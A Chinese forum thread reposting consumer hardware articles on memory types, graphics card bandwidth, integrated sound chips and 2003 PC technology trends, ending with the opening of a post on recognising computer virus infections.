检测;高速缓存;Cache 介绍用软件检测Cache的方法 ,主板上Cache的大小和有无很难用一般方法判断,尤其是有的主板连BIOS都被不法经销商修改过以方便作假。486时代常用的拔插法现在也不灵了——奔腾主板上很多标称256K的Cache芯片都是直接SMT(表面安装)上去的,无法拔插。测试Cache的软件确实有一些,如 CCT等,但普通用户很难得到这些专业软件。


2.分类认识内存

内存作为微型计算机的重要部件之一,已从早期的普通内存,发展到目前的同步动态内存,还有越来越广泛地应用于多媒体领域的RDRAM与后来的SDRAM Ⅱ、DDR RAM。

内存大致的分类情况如下:

1.FPM(Fast Page Mode)

FPM(快页模式)是较早的个人计算机普遍使用的内存,它每隔3个时钟脉冲周期传送一次数据。现在已很少见到使用这种内存的计算机系统了。

2.EDO(Extended Data Out)

EDO(扩展数据输出)内存取消了主板与内存两个存储周期之间的时间间隔,每隔2个时钟脉冲周期传输一次数据,大大地缩短了存取时间,使存取速度提高30%,达到60ns。EDO内存主要用于72线的SIMM内存条,以及采用EDO内存芯片的PCI显示卡(参阅本书后面的内容)。

注:EDO内存条是普通DRAM内存的改进型,它比普通内存提高速度约10%20%左右。当它在完成某一单元信息的读写之前,能提前读写下一单元的信息,这样就提高了内存的读写速度。但只是在普通内存的基础上改进了它的读写方式,但它的读写速度却仍然不够快,只能达到50ns60ns之间。对于CPU的几ns的速度来说,仍然存在着很大的差别。

这种内存流行在486以及早期的奔腾计算机系统中,它有72线和168线之分,采用5V电压,带宽32 bit,可用于Intel FX/VX芯片组主板上,所以某些使用奔腾100/133的计算机系统目前还在使用它。不过要注意的是,由于它采用5V电压,跟下面将要介绍的SDRAM不同(SDRAM为3.3v),两者混合使用时就会很容易会被烧毁,因此在使用前最好了解一下该主板使用的是3.3v还是5V电压。

3.S(Synchronous)DRAM

SDRAM(同步动态随机存储器)是目前奔腾计算机系统普遍使用的内存形式。SDRAM将CPU与RAM通过一个相同的时钟锁在一起,使RAM和CPU能够共享一个时钟周期,以相同的速度同步工作,与 EDO内存相比速度能提高50%。

注:SDRAM采用的是新型的64位数据读写形式,内存条的引脚为168线,采用双列直插式的DIMM内存条,读写速度最高达到了10ns,是目前最快的内存芯片,同时也是奔腾II和奔腾III计算机系统首选的内存条。

随着SDRAM的问世,快页模式(FPM)DRAM被很彻底打入了冷宫。由于高效内存集成电路的出现和为优化的奔腾CPU运行效能而设计的INTEL HX、VX等核心逻辑芯片组的支持, EDO DRAM被广泛采用了,它采用了一种特殊的内存读出电路控制逻辑,在读写一个地址单元时,同时启动下一个连续地址单元的读写周期。从而节省了重选地址的时间,使存储总线的速率提高到 40 MHz。也就是说,因此说与快页内存相比性能提高了将近15%~30%,而其制造成本却与之相近,但是也只是辉煌了一时,面市的时间将极为短暂,这是为什么呢?因此不久之后市场上主流CPU的主频高达200 MHz以上。为优化CPU的运行效能,总线时钟频率至少要达到66 MHz以上,多媒体应用程序以及Windows 95/97/98和Windows NT操作系统对内存的要求也越来越高,为缓解速度不够的瓶颈只有采用新的内存结构,否则就不能支持高速总线时钟频率,而不必于插入指令等待周期,在理论上内存的速度需要与CPU频率同步,即与CPU共享一个时钟周期的同步动态内存(Synchronous DRAMS),所以SDRAM应运而生,与其它内存结构相比,性能/价格比最高,最终取代了它们成为了内存发展一个时期内的主流。

SDRAM基于双存储体结构,内含两个交错的存储阵列,当CPU从一个存储体或阵列访问数据时,另一个就已为读写数据做好了准备,通过这两个存储阵列的紧密切换,读取效率就能得到成倍的提高。SDRAM的速度早就超过了100MHz,存储时间达到5~ 8ns毫不费力,现在128 MB的SDRAM内存条也是大量上市,SDRAM占据市场的主导地位已是不可否认的事实,其价格也在大幅下降。

SDRAM不仅可用作主存,在显示卡上的内存方面也有广泛应用。对前者来说,数据带宽越宽,同时处理的数据就越多,显示的信息就越多,显示品质也就越高。在此之前的计算机系统还用过可同时读写的双端口视频内存(VRAM)来提高带宽,但这种内存成本高,应用受很大限制。因此在一般显示卡上,廉价的DRAM和高效的EDO DRAM仍然还在应用着。但随着64位显示卡的上市,带宽已扩大到EDO DRAM所能达到的带宽的极限,要达到更高的1600×1200的分辨率,而又尽量降低成本,就只能采用频率达66MHz、高带宽的SDRAM了。SDRAM还应用了共享内存结构(UMA),这在很大程度上降低了系统成本,因为许多高性能显示卡价格高昂,就是因为其专用显示内存成本极高所致,而UMA技术将利用主存作显示内存,不再需要增加专门显示内存,因而降低了成本。

注:SDRAM与用作Cache的SRAM是两个不同的概念,SRAM的全称是Static RAM(静态RAM),速度虽快,但成本高,不适合做主存。

4. DDR SDRAM(SDRAM II)

DDR(Double Data Rage双数据率) 也就是 SDRAMSDRAM II,是SDRAM的更新换代产品,它允许在时钟脉冲的上升沿和下降沿传输数据,这样不需要提高时钟的频率就能加倍提高SDRAM的速度,并具有比SDRAM多一倍的传输速率和内存带宽,如64bit内存接口200MHz DDR SDRAM比PC100 SDRAM的内存带宽高一倍,266 MHz DDR SDRAM的内存带宽更是达到了2.12 GB/s。DDR SDRAM比800MHz RDRAM的内存带宽还要高,采用2.5v工作电压,价格也便宜非常多。过去,DDR SDRAM只是应用在显示卡上,现在由于DDR SDRAM标准已定制好,所以正有许多主板芯片组支持使用它。不过,第一款支持DDR SDRAM的芯片组并不是Intel推出的。而是由Micron推出的,其名称为Samurai DDR芯片,其性能的优秀性无论是在商业,还是游戏运行方面都赶得上Intel i840芯片组。但后者提供双RDRAM通道,可高达3.2 GB/s的内存带宽,比Samurai DDR 266 MHz DDR SDRAM提供的2.12G/秒的内存带宽高出33%,整体性能也要好一些,这其是因为RDRAM的潜伏等待时间要比SDRAM长,所以PC133 SDRAM(参阅下面的内容)和DDR SDRAM使得RDRAM在低端和高端系统上的优势全无,而DDR SDRAM更是成为了市场的主流。如,现代电子出品的64MB DDR SDRAM在128 MB内存总线,4Mx16颗,工作频率为333MHz,提供了5.3 GB/s的数据带宽,市场前景不用说了,一定会是不错的。

5.RDRAM(Rambus DRAM)

RDRAM(存储器总线式动态随机存储器)是Rambus公司开发的具有系统带宽、芯片到芯片接口设计的新型DRAM,它能在很高的频率范围下通过一个简单的总线传输数据,同时使用低电压信号,在高速同步时钟脉冲的两边沿传输数据。

6.Flash Memory

Flash Memory(闪速存储器)是一种新型半导体存储器,主要特点是在不加电的情况下长期保持存储的信息。就其本质而言,Flash Memory属于EEPROM(电擦除可编程只读存储器)类型,既有ROM的特点,又有很高的存取速度,而且易于擦除和重写,功耗很小。目前其集成度已达4MB,同时价格也有所下降。由于这一独特优点,Flash Memory在一些较新的主板上普遍采用着,以便使得BIOS 升级非常方便,但时也会CIH这样的计算机病毒以可乘之机,让许多计算机饱受磨难。

Flash Memory可用作固态大容量存储器,但目前普遍使用的大容量存储器仍为硬盘。硬盘虽有容量大和价格低的优点,但它是机电设备,有机械磨损,可*性及耐用性相对较差,抗冲击、抗振动能力也弱,功耗也大。而Flash Memory集成度高,价格也在逐渐降低,专家们对它的应用前景相当乐观。

7.Shadow RAM

Shadow RAM也称为“影子内存”,是为了提高计算机系统效率而采用的一种专门技术,所使用的物理芯片仍然是CMOS DRAM(动态随机存取存储器,参阅本书后面的内容)芯片。Shadow RAM 占据了系统主存的一部分地址空间。其编址范围为C0000~FFFFF,即为1MB主存中的 768KB~1024KB区域。这个区域通常也称为内存保留区,用户程序不能直接访问。 Shadow RAM的功能就是是用来存放各种ROM BIOS的内容。也就是复制的ROM BIOS内容,因而又它称为ROM Shadow,这与Shadow RAM的意思一样,指得是ROM BIOS的“影 子”。现在的计算机系统,只要一加电开机,BIOS信息就会被装载到Shadow RAM中的指定区域里。由于Shadow RAM的物理编址与对应的ROM相同,所以当需要访问BIOS时, 只需访问Shadow RAM而不必再访问ROM,这就能大大加快计算机系统的运算时间。通常访问ROM的时间在200ns左右,访问DRAM的时间小于100ns、60ns,甚至更短。

在计算机系统运行期间,读取BIOS中的数据或调用BIOS中的程序模块的操作将是相当频繁的,采用了Shadow RAM技术后,无疑大大提高了工作效率。

8.ECC内存

ECC(Error Correction Coding或Error Cheching and Correcting)是一种具有自动纠错功能的内存,Intel的82430HX芯片组就支持它,使用该芯片的主板都可以安装使用ECC内存,但由于ECC内存成本比较高,所以主要应用在要求系统运算可*性比较高的商业计算机中。由于实际上存储器出错的情况不会经常发生,相关的主板产品还不多,一般的家用与办公计算机也不必采用ECC内存。

9. CDRAM(Cached DRAM)

CDRAM(Cached DRAM)带高速缓存动态随机存储器)是日本三菱电气公司开发的专有技术,它通过在DRAM芯片上集成一定数量的高速SRAM作为高速缓冲存储器和同步控制接口来提高存储器的性能。这种芯片使用单一的+3.3V电源,低压TTL输入输出电平。

10.DRDRAM(Direct Rambus DRAM)

DRDRAM (接口动态随机存储器)是Rambus在Intel支持下制定的新一代RDRAM标准,与传统DRAM的区别在于引脚定义会随命令而变,同一组引脚线可以被定义成地址,也可以被定义成控制线。其引脚数仅为正常DRAM的三分之一。当需要扩展芯片容量时,只需要改变命令,不需要增加芯片引脚。这种芯片可以支持400MHz外频,再利用上升沿和下降沿两次传输数据,可以使数据传输率达到800MHz。同时通过把单个内存芯片的数据输出通道从8位扩展成16位,这样在100MHz时就可以使最大数据输出率达1.6 GB/s。

11.SLDRAM(Synchnonous Link DRAM)

SLDRAM(同步链接动态内存)是由IBM、惠普、苹果、NEC、富士通、东芝、三星和西门子等大公司联合制定的,一种原本最有希望成为标准高速DRAM的存储器。这是一种在原DDR DRAM基础上发展起来的高速动态读写存储器,具有与DRDRAM相同的高数据传输率,但其工作频率要低一些,可用于通信、消费类电子产品、高档的个人计算机和服务器中。不过,由于各种各样的原因,这种动态存储器难以形成气候。

12.VCM(Virtual Channel Memory)

VCM(虚拟通道存储器)由NEC公司开发,是一种新兴的缓冲式DRAM,可用于大容量的SDRAM。此技术集成了“通道缓冲”功能,由高速寄存器进行配置和控制。在实现高速数据传输,让带宽增大的同时还维持着与传统SDRAM的高度兼容性,所以通常也把VCM内存称为VCM SDRAM。

13. FCRAM(Fast Cycle RAM)

FCRAM(快速循环动态存储器)是由富士通和东芝联合开发的内存技术,数据吞吐速度可超过DRAM/SDRAM的4倍,能应用于需要极高内存带宽的系统中,如服务器、3D图形及多媒体处理等场合,其主要的特点是:行、列地址同时(并行)访问,而不像普通DRAM那样首先访问行数据,再访问列数据。此外,在完成上一次操作之前,便开始下一次操作。不过这并用于主内存,而是用于诸如显示内存这样的其他存储器上



显卡

对于每一位追求电脑性能的DIY来说,显卡无疑是最重要的一样配件。在这个显卡技术高速发展的阶段,虽然可选择的显卡芯片厂商减少了,但基于相同厂商的显卡型号却分得很细,性能也各不相同。其中繁复处可能即便是专业人员也难以尽述。用户选择显卡的时候对一些专业数据接触也多了,简单点如芯片内核频率、显存频率,复杂点如像素填充率、显存带宽等。各显卡品牌在各自的显卡描述中也有这方面提及,但对于有些方面可能会有故意忽略某些细节,只提供那些炫目的优势数据,用户没有完整的了解,这是缺乏公平性的。这里我主要给大家介绍一下显卡的性能参数,如何根据这些参数确定显卡的性能,希望你在下次选购显卡时能更好的选到自已所需的产品。

首先我们了解一下对于一块显卡来说最重要的指标是什么。这里排除显卡对整个系统显示性能起决定性作用的包括了CPU、内存、主板和驱动软件。这样一个平台必须处理大量几何运算,如大家常听到的T&L即光源和变形处理技术就需要强劲的浮点运算并占用主存储器带宽。如果显卡不带硬件T&L功能,这部分任务就全部落在CPU、内存和主板组成的工作组上。在图形帧幅计算时,顶点和纹理通过总线(即PCI或者AGP 1x、2x、4x)传送至3D卡。

这时如果这个平台越快,所传输的帧幅也越多。这些影响显卡性能的外因并不是我今天想讲的,对于显卡本身最重要的是其芯片提供的像素填充率和它的显存带宽。下面让我们来了解它们:

像素填充率的最大值为3D时钟乘以渲染途径的数量。如NVIDIA的GeForce 2 GTS芯片,核心频率为200 MHz,4条渲染管道,每条渲染管道包含2个纹理单元。那么它的填充率就为4x2像素x2亿/秒=16亿像素/秒。这里的像素组成了我们在显示屏上看到的画面,在800x600分辨率下一共就有800x600=480,000个像素,以此类推1024x768分辨率就有1024x768=786,432个像素。我们在玩游戏和用一些图形软件常设置分辨率,当分辨率越高时显示芯片就会渲染更多的像素,因此填充率的大小对衡量一块显卡的性能有重要的意义。刚才我们计算了GTS的填充率为16亿像素/秒,下面我们看看MX200。它的标准核心频率为175,渲染管道只有2条,那么它的填充率为2x2像素x1.75亿/秒=7亿像素/秒,这是它比GTS的性能相差一半的一个重要原因。大家知道了,填充率的大小取决于显示芯片,目前只要买正规厂商的显卡都不会在芯片上有什么机关,一分钱一分货,而我下面重点要讲的显存就没有这么透明了。

我们在购买显卡时常可以看到关于显存的参数,主要有显存的速度,以纳秒为单位;显存的工作频率,以MHz为单位;显存的数据位宽,以bit为单位。这里显存的速度决定了其工作频率,如-7.5ns的显存标准频率可上133MHz ,-5ns的显存标准频率可上200MHz。但在显卡上有时显存工作频率与其速度不成正比,如Geforce3普遍采用3.8ns的DDR显存,标准应该是263MHz ,因是DDRAM则标准频率为526MHz,而我们知道Geforce3的显存标准频率为460MHz,给用户预留了很大的超频空间。而也有显存速度标为-7ns的,本应为143MHz但却默认工作频率为166MHz ;有的显存速度标为-4.5ns却不能上222MHz。所以在购买显卡时单看显存芯片上标识的速度值并不可*,一定要询问清楚显存的默认工作频率。

显存的数据位宽是一项经常被用户忽略的参数,但是其重要性甚至要超过显存的工作频率,因为位宽决定了显存带宽,而显存带宽已经成为现在制约显卡性能的瓶颈。显示芯片与显存之间的数据交换速度就是显存的带宽,单只芯片有强大的处理能力, 但显存带宽不高的话 ,显存将制约着这块芯片无法达到其设计处理能力。我们把Geforce3的显存频率超到500MHz,这时带宽高达8GB/s,但是在一些复杂图形环境一样会因显存带宽不够而影响到处理速度。在显卡工作过程中,Z缓冲器、帧缓冲器和纹理缓冲器都会大幅占用显存带宽资源。带宽是3D芯片与本地存储器传输的数据量标准,这时候显存的容量并不重要,也不会影响到带宽,相同显存带宽的显卡采用64MB和32MB显存在性能上区别不大。因为这时候系统的瓶颈在显存带宽上,当碰到大量像素渲染工作时,显存带宽不足会造成数据传输堵塞,导致显示芯片等待而影响到速度。目前显存主要分为64位和128位,在相同的工作频率下,64位显存的带宽只有128位显存的一半。显存带宽的计算方法是带宽=工作频率X数据位宽/8。这也就是为什么Geforce2 MX200(64位SDR)的性能远远不如Geforce2 MX400(128位SDR)的原因了。许多显卡广告中对64位显存避而不谈,采用不告知政策,用户在采购显卡时应该问清楚这一问题,在相同的频率下, 16M 128bit的性能可能比32M 64bit还要好的,因为显存带宽对于显卡性能太重要了。对于未来显卡性能提升,当务之急是要解决显存的带宽问题。

由于现阶段内存芯片价格极低,许多厂商开始在显存容量上做文章。采用64MB显存的显卡越来越多。不过好像有一款Geforce2 MX400虽用了64MB显存,但却不采用MX400标准128位显存而改用了64位显存,这样在性能上不会有提高。个人觉得这种做法有诱骗用户的成份,以显存容量吸引用户,却不告知用户关于性能上的实情,用户得花比正规32MB显卡要多的钱去买他蓄意降低性能迎合市场的产品。但对于这个厂商在成本上也确实要高一些,最终落得双方均不划算,这种市场手段太失败,主要原因是因为策划者没有把用户放在第一位去替他们着想,只顾玩弄市场手段,最后吃亏的还是自已。



集成声卡

整合技术是PC发展的趋势,目前市场上的一些主板更是将这一特色发挥地淋漓尽致,那些集成了显卡、声卡的主板正大行其道(其中以集成声卡为最为普遍)。不过,由于认识的误区,很多DIYer对集成声卡并不感兴趣,甚至把“集成声卡”与“劣质声卡”划等号,或者干脆称其为“垃圾”,事实果真如此吗?

??一、何谓AC’97
??自从威盛(VIA)在其MVP3主板芯片中提出了“AC’97声卡”这个概念,我们便常常在形形色色的主板说明书上见到它,最后也就有了“AC’97软声卡”一说。发展到后来,“AC’97”干脆成了软声卡的代名词。可是如果你去看看某些高档声卡的技术资料,你就会惊讶地发现“该卡采用AC’97标准”,难道高档声卡也是软声卡?要知道这其中的奥妙,还须先认识AC’97规范(或标准)。

??1.AC’97的提出
??1996年6月,5家PC领域中颇具知名度和权威性的软硬件公司共同提出了一种全新思路的芯片级PC音源结构,也就是我们现在所见的“AC’97”标准(Audio Codec97)。

??2.什么是AC’97规范
??早期的ISA声卡由于集成度不高,声卡上散布了大量元器件,后来随着技术和工艺水平的发展,出现了单芯片的声卡,只用一块芯片就可以完成声卡所有的功能。但是由于声卡的数字部分和模拟部分集成在一起,很难降低电磁干扰对模拟部分的影响,使得ISA声卡信噪比并不理想。

??AC’97标准则提出“双芯片”结构,即将声卡的数字与模拟两部分分开,每个部分单独使用一块芯片。AC’97标准结合了数字处理和模拟处理两方面的优点,一方面减少了由模拟线路转换至数字线路时可能会出现的噪声,营造出了更加纯净的音质;另一方面,将音效处理集成到芯片组后,可以进一步降低成本。

??3.AC’97的应用
??1997年后,市场上出现的PCI声卡大多数已经开始符合AC’97规范,把模拟部分的电路从声卡芯片中独立出来,成为一块称之为“Audio Codec”(多媒体数字信号编解码器)的小型芯片,而声卡的主芯片即数字部分则成为一块称之为“Digital Control”(数字信号控制器)的大芯片。

??由此可见,AC’97并不是某种声卡的代称,而是一种标准。

??二、集成声卡中的主流──软声卡
??通过上面的介绍,我们知道一块符合AC’97标准的声卡是有“Audio Codec”与“Digital Control”两个芯片的。那么所谓的“AC’97软声卡”是什么意思呢?原来,VIA和INTEL相继在主板芯片组的南桥芯片中加入声卡的功能,通过软件模拟声卡,完成一般声卡上主芯片的功能,音频输出就交给“Audio Codec”芯片完成。所以这类主板上没有那种较大的“Digital Control”芯片,只有一块小小的“Audio Codec”芯片。下面我们就以一块创新Sound Blaster PCI128 Digital和一款i815E主板为例,来看看普通声卡与AC’97软声卡的区别。

??我们很容易在声卡上找到那块比较大的主芯片──“Digital Control”及体积很小的“Audio Codec”,Sound Blaster PCI128 Digital的“Digital Control”芯片(图1中的1标记处)型号是“CT5880”。作为声卡上的核心处理芯片,“Digital Control”的作用如同计算机中的CPU,需完成大部分的声卡功能,如WAV回放、MIDI合成、音效处理等,声卡的主要技术参数都取决于它,它是决定声卡档次的重要依据。距离“Digital Control”不远就是“Audio Codec”芯片,别看它小,它比普通DAC(数模转换)芯片能完成更多的功能,包括把模拟信号转换为数字信号的ADC(模数转换),多路模拟信号混合输入及输出等多种功能,跟音响中的数字编码/解码器和前置功放的作用差不多。这里的“Audio Codec”是SigmaTel的STAC9708芯片。根据AC’97标准的规定,不同“Audio Codec”芯片之间的引脚兼容,原则上可以互相替换。

??由于软声卡没有“Digital Control”芯片,而是采用软件模拟,所以CPU占用率比一般声卡高。如果CPU速度达不到要求或因为驱动软件有问题,就很容易产生爆音,影响音质。

??三、集成声卡中的“另类”──硬声卡
??由于软声卡有着诸多不足,于是一些主板厂商便想到了另外一个集成声卡的方法──将普通声卡上的“Digital Control”芯片也“搬”到主板上,即把芯片及辅助电路都集成到主板上(这种“集成声卡”其实就是传统意义上的声卡),这样相对于单独的主板和声卡来说,成本降低了很多,而且声音效果在理论上与独立声卡差不多。在这种集成硬声卡主板PCI插槽的附近,你都能找到一块大大的“Digital Control”芯片。

??目前集成硬声卡的主板越来越多,常见的芯片有以下几种:

??1.CT5880

??CT5880是创新公司面向中低端市场的一款主打产品,采用该芯片制成的声卡就是“Sound Blaster PCI128 Digital”。它支持128复音和多音色,16个MIDI通道,并且支持4声道;支持Microsoft DirectSound、DirectSound 3D及其衍生标准。就CT5880的表现而言,能满足绝大部分对声音要求不是很高的用户需求。CT5880是目前使用最多的一款被集成到主板上的音效芯片。

??2.CMI8738

??CMI8738是台湾骅讯电子(C-Media)的产品。1999年自行开发出4声道音效芯片CMI8738/4CH,除了具有3D定位功能,同时也提供数字光纤接口,以及支持家庭剧院系统。在CMI8738/4CH的基础上,骅讯又推出了6声道的CMI8738/6CH音效芯片。除具备CMI8738/4CH的所有功能外,该芯片还增加了的6声道的输出功能。它可搭配5.1的6声道或4.1的4声道音箱,配合DVD播放软件构成完整的小型个人家庭剧院系统需昂贵的外部硬件。

??注意:CMI8738内置了“Audio Codec”芯片,虽然降低了成本,减少了电路的复杂程度,但不符合AC’97标准,因此信噪比不高,不适合那些注重音质的用户使用。还有,因为CMI8738有多个版本,所以在挑选集成该芯片的主板时,一定要注意芯片的版本号。

??3.YAMAHA 744

??YAMAHA公司的音效芯片在用户中一直有比较好的口碑,从ISA时代的719到PCI时代的724,都获得了不小的成功。与 YMF724相比,YMF744的功能也得到了较大的改进,其最新版本为YMF744B-V。芯片支持PCI2.2和PC99规范,为128针LQFP封装,支持多声道4扬声器输出,可为用户提供环绕立体声效果。744芯片最大的特点是它的三维音效功能,它完全支持EAX环境音效、Direct Sound和Direct Sound 3D,并可通过软件运算获得A3D效果。

??四、使用集成声卡的注意事项
??不管是集成的软声卡,还是硬声卡,由于目前主板在设计上还没有大的突破,所以在实际使用中最容易出现干扰大、有爆音等毛病。因此,要让你的集成声卡有更好的表现,请注意以下几点:

??1.驱动程序是关键。驱动程序对于声卡的表现非常重要,特别是软声卡,好的驱动程序往往能使其表现让你刮目相看。对于硬声卡,可以到该芯片的生产商网站下载其最新驱动程序,如CT5880,就可以到创新公司下载“Sound Blaster PCI128 Digital”的驱动程序。

??2.关闭某些输入端口。在声卡的音频属性中,将那些用不着的输入端口置于“静音”状态,如“线路输入”、“麦克风输入”等,这样也能减少噪音的干扰(图7图)。

??3.尽量不超频。当将系统的外频超到一定程度后,集成声卡就无法正常工作。这是因为机器在非标准外频下工作时,PCI的工作频率也随之提高,而集成声卡是集成在主板上的,其超频性能特别差,所以为了声卡的安全与性能,还是不要超频或者适度超频。
200MHz外频桌面处理器普及

  对于PC系统而言,外频的重要性不言而喻。然而,或许是我们已经习惯了Intel以及AMD的创举,面对2003年的200MHz外频大潮,激动之情已经略显衰退。但是从技术角度而言,其重要性丝毫不打折扣。

  采用Quad Pump前端总线技术的Pentium4处理器因为采用了200MHz外频而达到800MHz前端总线,这也是其性能大幅度提高的重要原因之一,令NetBurst架构发挥出最大的威力。同样,当AMD将Barton处理器提升到200MHz外频之后,配合其512KB大容量二级缓存,Socket A平台的性能也变得前所未有的强大。200MHz外频的意义不仅仅是改善处理器性能,内存性能也因此得以提高。DDR400技术的出现帮助系统同步运行,此时整体系统性能的提升幅度令人相当满意。

  64位桌面处理器浮出水面

  AMD于2003年9月23日发布的Athlon64将成为一款具有里程碑意义的产品。这也是继80386处理器之后又一次对指令执行位数的升级,达到64位。然而与以往不同的是,此次“单干”的AMD选择了更为稳妥的策略,X86-64对于32位程序具有极佳的兼容性,因此理应可以顺利完成过渡期。从目前的表现来看,即便是在32位测试软件中,Athlon64的表现也十分抢眼,完全不输于高频率的Pentium4甚至P4EE。更为重要的是,Windows XP-64Bit Editon、Windows 2003 Sever、Solaris 64bit Editon以及Linux64等操作系统都已经提供对X86-64的支持,这也标志着今后Athlon64将不会孤立无援,因此前景一片大好。

  毫无疑问,这将是Intel最不希望看到的局面,它可以容忍AMD的处理器在性能上超越自己,但是决不能坐视业界向自己最不期望的方向发展。一旦AMD凭借强大的业界联盟使软件开发商倒向64位平台,Intel将会十分被动,甚至迫不得已向X86-64低头,继而以授权的方式将其引入下一代Intel处理器。

  DirectX9显卡遍地开花ctX9显卡

  在速度上的过分追求已经使玩家对3D游戏失去了兴趣,以高成本来缔造“像素填充率”显然是没有意义的。诚然,各种绚丽夺目的3D特效需要极高的像素填充率以及显存带宽作保证,但是在硬件上支持更多的特效才是重中之重。

  令人感到欣喜的是,支持DirectX9 API的显卡在2003年大量出现,它们以极高的性价比吸引大量用户。甚至在低端市场,雄心勃勃的Geforce FX5200系列更是将DirectX9 API彻底普及化。正是在这样的环境下,游戏开发人员才得以撇开恼人的兼容性问题,大胆地采用更多新技术,令3D游戏特效达到前所未有的高度。

  双通道DDR芯片组统领潮流

  当我们正在为Intel与AMD的频率大战而津津乐道之时,猛然间发现芯片组似乎在一定程度上主宰了这场比拼的胜负。毫无疑问,系统整体性能的发挥离不开芯片组的支持,而决定芯片组的关键就在于北桥芯片中的内存控制器。

  当DDR SDRAM工作频率高于133MHz时,其信号波形往往会出现失真问题,这些都为设计支持双通道DDR内存系统的芯片组带来不小的难度,芯片组的制造成本也会相应地提高。不过当nVIDIA率先攻破技术壁垒推出nForce芯片组之后,SiS与Intel迅速跟进,VIA也即将加入这一阵营。毫无疑问,双通道DDR芯片组普及已是板上钉钉,这也是2003年芯片组技术的一大亮点。

  SerialATA硬盘继往开来

  为了彻底解决硬盘外部接口的瓶颈,由七家公司联合组建的“串行ATA工作集团”制定了第一代SerialATA规范。令人感到高兴的是,2003年出现了大量直接支持SerialATA技术的南桥芯片,同时Promise、HighPoint以及Silicon的SerialATA磁盘控制芯片也令不少老主板得以使用SerialATA硬盘。

  除了SerialATA控制芯片,本身采用SerialATA接口的硬盘也相继浮出水面,其中Seagate与Maxtor更是将SerialATA硬盘的成本大幅度下降,直接促成其普及。应当指出的是,目前SerialATA硬盘仍旧没能充分发挥出SerialATA接口的优势,一方面是内部传输率不足,另一方面便是大多数SerialATA依旧采用转接芯片,其内部信号依旧是并行的。

  DVD刻录机应运而生

  CD-RW的普及一定程度上缓解了存储设备的容量危机,但是面对GB数量级的视频文件以及备份应用,传统CD-RW不堪重负。在DVD规格之争逐渐明朗之后,一场由DVD刻录而带来的存储革命已经悄然向我们袭来。

  在2003年之初,主流DVD刻录标准主要分为三种:DVD-RAM、DVD-R/RW与DVD+R/RW,而且互相之间并不兼容,这也是阻碍其发展重要因素。继DVDRAM基本宣告退出民用市场之后,DVD-R/RW与DVD+R/RW真正在产品技术上实现融合。原本以为仅仅是一厢情愿的DVD-Dual规格,因为控制芯片成本的下降以及权利金的下调而迅速脱颖而出。至此,DVD刻录的大局面终于初步形成,无论从市场需求、产品成本以及业界支持度来看都是如此。更为重要的是,如今DVD刻录机的技术也不断成熟,8X刻录令4.5GB的数据只需要短短10分钟不到即可完成!

  LCD品质趋于完善

  早在2001年,液晶显示器就渴望取代老态龙钟的CRT。但是,随着液晶面板的价格暴涨,LCD很快就偃旗息鼓了。时隔两年之后,LCD东山再起,卷土重来,技术与市场的成熟却真正让LCD与我们*得更近。

  如今的LCD在可视角度、对比度、亮度、响应时间等方面都取得长足的进步。通过多灯管技术,LCD的对比度与亮度逐渐弥补与CRT显示器之间的差距,而且整体色彩表现更为均匀。更为使人高兴的是,响应时间的缩短令LCD的应用范围大幅度拓宽。

  数字显亮技术也是本年的一个亮点,飞利浦倡导的这个技术从提高锐度方面入手提高LCD显示器清晰度,使LCD向取代CRT的目标迈出了一大步。

  移动存储突破同质化

  长期以来移动存储产品无法突破同质化这个怪圈,大多数产品在外形功能性能上几乎一模一样。2003年度出现了几款突破同质化桎梏的移动存储产品,它们在功能、设计、性能上均标新立异,给了消费者更多的选择和惊喜。

  其中比较有代表性的就是朗科公司推出的新概念产品——可视优盘,它在传统闪存盘数据存储与交换功能的基础上,独出心裁地增加了液晶显示功能,用户无须将闪存盘插在电脑上,就可以从显示屏上一目了然地识别所有静态和动态信息。静态信息如用户名、容量、电话号码、问候语等;动态信息则包括优盘在读写时显示的动态容量、传输过程等,从而使移动存储产品无论在外观还是功能上都有了质的飞跃。

  无线网路触动心弦

  当100M网卡普及之后,有线网络的技术已经非常成熟了,但是当你发现冗长的网线束缚了你的移动设备,无线网络的必要性就得以突显。

  与蓝牙技术相比,今年流行的WIFI技术显然更具实用性。IEEE802.11b标准的WIFI无线网络得到11Mbps带宽,然而更为重要的是,它在传输距离方面具有很大的优势,甚至渴望成为局域有线网络的接替者。

  更为令人欢欣鼓舞的是,IEEE802.11b并非是WIFI技术的终点。具备54Mbps带宽的IEEE802.11g已经开始悄悄普及,甚至连100Mbps带宽的IEEE802.11n都浮出水面。毫无疑问,未来无线网路技术一大热门技术,特别是在破解传输带宽、传输范围以及安全性等诸多技术难题之后。

  数码相机技术指标全面提升?

  数码相机以全新的摄影操作和一些特殊的功能应用改变着人们百年来培养起来的传统摄影观念,并开始冲击传统相机在人们生活中的地位。应当清醒并欣喜地认识到,伴随着数码相机技术的成熟化,数码影像在2003年取得长足的进步。

  我们惊喜地看到600万像素成为一道亮丽的风景线,尽管数码相机的像素级别绝非是衡量性能的唯一标准,就像CPU无法度量整机的总体表现一样,但是这并不妨碍我们关注这项技术。300万像素的普及意味着数码照片将不仅仅局限于电脑屏幕,此时数码冲印的效果已经可以媲美于传统银盐彩扩;而更高的像素对于大幅面数码冲印也是大有裨益的,更令数码变焦也能体现出一定的实用价值。

  此外,高品质光学镜头的确也令数码相机的水准大幅度提高,不仅有效改善了画质,同时高倍光学变焦也得以普及。佳能与卡西欧所采用的佳能原装镜头、索尼所采用的高级蔡司、美能达所采用的GT系列镜头、柯达所采用的德国Schneider-Kreuznach Variogon镜头,这些都为数码相机在本质性能上提高打下坚实基础。
鱼溺水而亡,是为了让大海能够记住他~
37楼
编辑   |    引用    回帖
关闭    高亮    置顶   |    移动    回收站   |    -6删帖    删帖    |   
82622206

田鼠

中级会员

将军

贴子 1814

精华 3

积分 1061

信用 0

竞猜 0

魅力 188

威望 0

现金 70 CZB

银行 0 CZB

黄金 0

比特币 0

注册时间 2005-06-01

发表于:2005-12-05 15:12:14   |  只看该作者   |  转账至  82622206

如何判断你的电脑是否中毒

各种病毒时至今日也可算是百花齐放了,搞得人心惶惶,一旦发现自己的电脑有点异常就认定是病毒在作怪,到处找杀毒软件,一个不行,再来一个,总之似乎不找到“元凶”誓不罢休一样,结果病毒软件是用了一个又一个,或许为此人民币是用了一张又一张,还是未见“元凶”的踪影,其实这未必就是病毒在作怪。

  这样的例子并不少见,特别是对于一些初级电脑用户。下面我就结合个人电脑使用及企业网络维护方面的防毒经验从以下几个方面给大家介绍介绍如何判断是否中了病毒,希望对帮助识别“真毒”有一定帮助!

  病毒与软、硬件故障的区别和联系

